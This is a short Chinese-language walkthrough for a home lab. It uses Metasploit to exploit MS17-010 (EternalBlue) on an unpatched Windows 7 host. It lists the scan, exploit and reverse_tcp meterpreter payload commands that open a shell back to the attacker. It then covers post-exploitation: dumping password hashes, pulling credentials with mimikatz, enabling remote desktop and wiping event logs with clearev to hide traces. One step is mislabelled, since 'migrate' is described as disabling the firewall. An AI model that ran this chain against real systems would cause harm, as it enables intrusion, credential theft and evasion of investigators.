攻击机:192.168.1.7 kali linux2019.2 x64
靶机:192.168.1.5 win7 x64(455端口一定要开启,系统不能带有ms17-010补丁,通过https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010查看补丁名称,并删除掉靶机里面的ms17-010补丁)
一、通过msfconsole命令进入msfconsole模块
命令:msfconsole
二、进入ms17_010的扫描模块
命令:use auxiliary/scanner/smb/smb_ms17_010
三、设置扫描的目标或者范围
命令:auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.5 若要范围扫描,则将IP改为 192.168.1.*
四、扫描
命令:run
192.168.1.5:445存在漏洞!!
五、切换到ms17_010的攻击模块
命令:use exploit/windows/smb/ms17_010_eternalblue
六、设置目标机ip
命令:set RHOST 192.168.1.5
七、设置payload
命令:set payload windows/x64/meterpreter/reverse_tcp
八、设置本机监听ip ,默认LPORT端口为4444 (可以通过show options查看 如果不是4444就设置)
命令:set LHOST 192.168.1.7
九、开始执行漏洞利用模块
命令:exploit
当出现meterpreter> 说明利用成功,如下图
十、远程操作目标主机
migrate 616 关闭对方防火墙
screenshot 截屏
hashdump 获取目标机hash值
load mimikatz 启动mimikatz
msv 导出hash值
kerberos 获得目标机的账号密码(要是空密码,就要自己创建一个用户,不过会被安全软件拦截) 另开一个终端(!!!!!!!!!!是另开一个!!!!!!!!) rdesktop 192.168.1.66 -u 账号 -p 密码 要是连不上就要开3389 run getgui -e 开3389命令,然后再执行上一条命令 clearev 擦除痕迹再跑路